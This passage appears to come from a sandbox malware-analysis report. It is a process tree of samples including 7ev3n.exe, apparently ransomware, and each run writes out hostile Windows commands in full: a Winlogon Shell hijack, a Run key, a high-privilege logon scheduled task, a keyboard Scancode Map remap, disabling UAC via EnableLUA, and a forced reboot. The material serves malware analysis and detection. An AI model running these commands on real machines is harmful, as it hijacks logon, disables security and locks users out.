                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 1100
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:5584
                                                              • C:\Users\Admin\Downloads\YouAreAnIdiot.exe
                                                                "C:\Users\Admin\Downloads\YouAreAnIdiot.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                PID:5480
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5480 -s 1100
                                                                  3⤵
                                                                  • Program crash
                                                                  PID:6056
                                                              • C:\Users\Admin\Downloads\7ev3n.exe
                                                                "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                2⤵
                                                                • Executes dropped EXE
                                                                • NTFS ADS
                                                                PID:2592
                                                                • C:\Users\Admin\AppData\Local\system.exe
                                                                  "C:\Users\Admin\AppData\Local\system.exe"
                                                                  3⤵
                                                                  • Executes dropped EXE
                                                                  PID:5048
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                    4⤵
                                                                    • System Location Discovery: System Language Discovery
                                                                    PID:4900
                                                                  • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                    C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                    4⤵
                                                                    • Scheduled Task/Job: Scheduled Task
                                                                    PID:2928
                                                                  • C:\windows\SysWOW64\cmd.exe
                                                                    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                    4⤵
                                                                      PID:5584
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                        5⤵
                                                                        • Modifies WinLogon for persistence
                                                                        PID:6640
                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                      4⤵
                                                                        PID:948
                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                          5⤵
                                                                          • Adds Run key to start application
                                                                          PID:6744
                                                                      • C:\windows\SysWOW64\cmd.exe
                                                                        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                        4⤵
                                                                        • System Location Discovery: System Language Discovery
                                                                        PID:5572
                                                                        • C:\Windows\System32\Conhost.exe
                                                                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                          5⤵
                                                                            PID:5756
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                            5⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:6928
                                                                        • C:\windows\SysWOW64\cmd.exe
                                                                          C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                          4⤵
                                                                            PID:4920
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                              5⤵
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:6892
                                                                          • C:\windows\SysWOW64\cmd.exe
                                                                            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                            4⤵
                                                                              PID:5284
                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                5⤵
                                                                                  PID:6900
                                                                              • C:\windows\SysWOW64\cmd.exe
                                                                                C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                4⤵
                                                                                  PID:5464
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                    5⤵
                                                                                    • UAC bypass
                                                                                    PID:6916
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                  4⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:7012
                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "crypted" /t REG_SZ /d 1 /f /reg:64
                                                                                    5⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:7144
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c shutdown -r -t 10 -f
                                                                                  4⤵
                                                                                    PID:6368
                                                                                    • C:\Windows\SysWOW64\shutdown.exe
                                                                                      shutdown -r -t 10 -f
                                                                                      5⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                      PID:6792
                                                                              • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                2⤵
                                                                                • Executes dropped EXE
                                                                                PID:4240
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                  3⤵
                                                                                  • System Location Discovery: System Language Discovery
                                                                                  PID:1988
                                                                                • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                  C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                                  3⤵
                                                                                  • Scheduled Task/Job: Scheduled Task
                                                                                  PID:5420
                                                                                • C:\windows\SysWOW64\cmd.exe
                                                                                  C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                  3⤵
                                                                                    PID:5876
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                      4⤵
                                                                                      • Modifies WinLogon for persistence
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:3164
                                                                                  • C:\windows\SysWOW64\cmd.exe
                                                                                    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:5576
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                      4⤵
                                                                                      • Adds Run key to start application
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:1932
                                                                                  • C:\windows\SysWOW64\cmd.exe
                                                                                    C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                    3⤵
                                                                                    • System Location Discovery: System Language Discovery
                                                                                    PID:2868
                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                      4⤵
                                                                                        PID:1700
                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                      3⤵
                                                                                      • System Location Discovery: System Language Discovery
                                                                                      PID:5400
                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                        REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                        4⤵
                                                                                          PID:5580
                                                                                      • C:\windows\SysWOW64\cmd.exe
                                                                                        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                        3⤵
                                                                                          PID:5588
                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                            4⤵
                                                                                            • System Location Discovery: System Language Discovery
                                                                                            PID:6108
                                                                                        • C:\windows\SysWOW64\cmd.exe
                                                                                          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                          3⤵
                                                                                            PID:5636
                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                              4⤵
                                                                                              • UAC bypass
                                                                                              PID:4192
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 4240 -s 1328
                                                                                            3⤵
                                                                                            • Program crash
                                                                                            PID:2612
                                                                                        • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                          "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:2456
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                            3⤵
                                                                                              PID:3164
                                                                                            • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                              C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                                              3⤵
                                                                                              • Scheduled Task/Job: Scheduled Task
                                                                                              PID:5460
                                                                                            • C:\windows\SysWOW64\cmd.exe
                                                                                              C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                              3⤵
                                                                                                PID:4444
                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                  4⤵
                                                                                                  • Modifies WinLogon for persistence
                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                  PID:5756
                                                                                              • C:\windows\SysWOW64\cmd.exe
                                                                                                C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                3⤵
                                                                                                  PID:3328
                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                    4⤵
                                                                                                    • Adds Run key to start application
                                                                                                    PID:4900
                                                                                                • C:\windows\SysWOW64\cmd.exe
                                                                                                  C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                  3⤵
                                                                                                    PID:2684
                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                      4⤵
                                                                                                        PID:5648
                                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                      3⤵
                                                                                                        PID:6088
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                          4⤵
                                                                                                            PID:3872
                                                                                                        • C:\windows\SysWOW64\cmd.exe
                                                                                                          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                          3⤵
                                                                                                            PID:1588
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                              4⤵
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:2968
                                                                                                          • C:\windows\SysWOW64\cmd.exe
                                                                                                            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4396
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                              4⤵
                                                                                                              • UAC bypass
                                                                                                              PID:5552
                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1324
                                                                                                            3⤵
                                                                                                            • Program crash
                                                                                                            PID:7088
                                                                                                        • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                          "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                          2⤵
                                                                                                          • Executes dropped EXE
                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                          PID:4284
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4016
                                                                                                          • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                            C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                                                            3⤵
                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                            PID:556
                                                                                                          • C:\windows\SysWOW64\cmd.exe
                                                                                                            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4724
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                              4⤵
                                                                                                              • Modifies WinLogon for persistence
                                                                                                              • System Location Discovery: System Language Discovery
                                                                                                              PID:4328
                                                                                                          • C:\windows\SysWOW64\cmd.exe
                                                                                                            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:4852
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                              4⤵
                                                                                                              • Adds Run key to start application
                                                                                                              PID:5468
                                                                                                          • C:\windows\SysWOW64\cmd.exe
                                                                                                            C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                            3⤵
                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                            PID:2752
                                                                                                            • C:\Windows\System32\Conhost.exe
                                                                                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                              4⤵
                                                                                                                PID:1932
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                4⤵
                                                                                                                • System Location Discovery: System Language Discovery
                                                                                                                PID:4532
                                                                                                            • C:\windows\SysWOW64\cmd.exe
                                                                                                              C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                              3⤵
                                                                                                                PID:1888
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                  4⤵
                                                                                                                  • System Location Discovery: System Language Discovery
                                                                                                                  PID:5564
                                                                                                              • C:\windows\SysWOW64\cmd.exe
                                                                                                                C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                3⤵
                                                                                                                  PID:1488
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                    4⤵
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    PID:5596
                                                                                                                • C:\windows\SysWOW64\cmd.exe
                                                                                                                  C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                  3⤵
                                                                                                                    PID:2784
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                      4⤵
                                                                                                                      • UAC bypass
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      PID:4420
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 4284 -s 1328
                                                                                                                    3⤵
                                                                                                                    • Program crash
                                                                                                                    PID:7132
                                                                                                                • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                                  "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                                  2⤵
                                                                                                                  • Executes dropped EXE
                                                                                                                  PID:812
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                                    3⤵
                                                                                                                      PID:2416
                                                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                                      C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                                                                      3⤵
                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                      PID:3692
                                                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                      3⤵
                                                                                                                        PID:2872
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                          4⤵
                                                                                                                          • Modifies WinLogon for persistence
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:1404
                                                                                                                      • C:\windows\SysWOW64\cmd.exe
                                                                                                                        C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:4640
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "System" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                            4⤵
                                                                                                                            • Adds Run key to start application
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5992
                                                                                                                        • C:\windows\SysWOW64\cmd.exe
                                                                                                                          C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                          3⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          PID:6124
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            REG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout" /v "Scancode Map" /t REG_BINARY /d "00000000000000001700000000003800000038e000005be000005ce00000360000001d0000001de000000f000000010000001c0000003e0000003b00000044000000450000003d0000005de000000000" /f /reg:64
                                                                                                                            4⤵
                                                                                                                              PID:2220
                                                                                                                          • C:\windows\SysWOW64\cmd.exe
                                                                                                                            C:\windows\system32\cmd.exe /c REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                            3⤵
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5540
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              REG ADD "HKEY_CURRENT_USER\Control Panel\Accessibility\StickyKeys" /v "Flags" /t REG_SZ /d 506 /f /reg:64
                                                                                                                              4⤵
                                                                                                                                PID:5832
                                                                                                                            • C:\windows\SysWOW64\cmd.exe
                                                                                                                              C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                              3⤵
                                                                                                                                PID:4884
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion" /v "rgd_bcd_condition" /t REG_SZ /d 1 /f /reg:64
                                                                                                                                  4⤵
                                                                                                                                    PID:5016
                                                                                                                                • C:\windows\SysWOW64\cmd.exe
                                                                                                                                  C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                                  3⤵
                                                                                                                                    PID:5160
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t REG_DWORD /d 0 /f /reg:64
                                                                                                                                      4⤵
                                                                                                                                      • UAC bypass
                                                                                                                                      PID:4876
                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 812 -s 1328
                                                                                                                                    3⤵
                                                                                                                                    • Program crash
                                                                                                                                    PID:7084
                                                                                                                                • C:\Users\Admin\Downloads\7ev3n.exe
                                                                                                                                  "C:\Users\Admin\Downloads\7ev3n.exe"
                                                                                                                                  2⤵
                                                                                                                                  • Executes dropped EXE
                                                                                                                                  PID:6120
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Local\del.bat
                                                                                                                                    3⤵
                                                                                                                                      PID:1888
                                                                                                                                    • C:\Windows\SysWOW64\SCHTASKS.exe
                                                                                                                                      C:\Windows\System32\SCHTASKS.exe /create /SC ONLOGON /TN uac /TR "C:\Users\Admin\AppData\Local\bcd.bat" /RL HIGHEST /f
                                                                                                                                      3⤵
                                                                                                                                      • Scheduled Task/Job: Scheduled Task
                                                                                                                                      PID:2168
                                                                                                                                    • C:\windows\SysWOW64\cmd.exe
                                                                                                                                      C:\windows\system32\cmd.exe /c REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "C:\Users\Admin\AppData\Local\system.exe" /f /reg:64
                                                                                                                                      3⤵
                                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                                      PID:6080
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
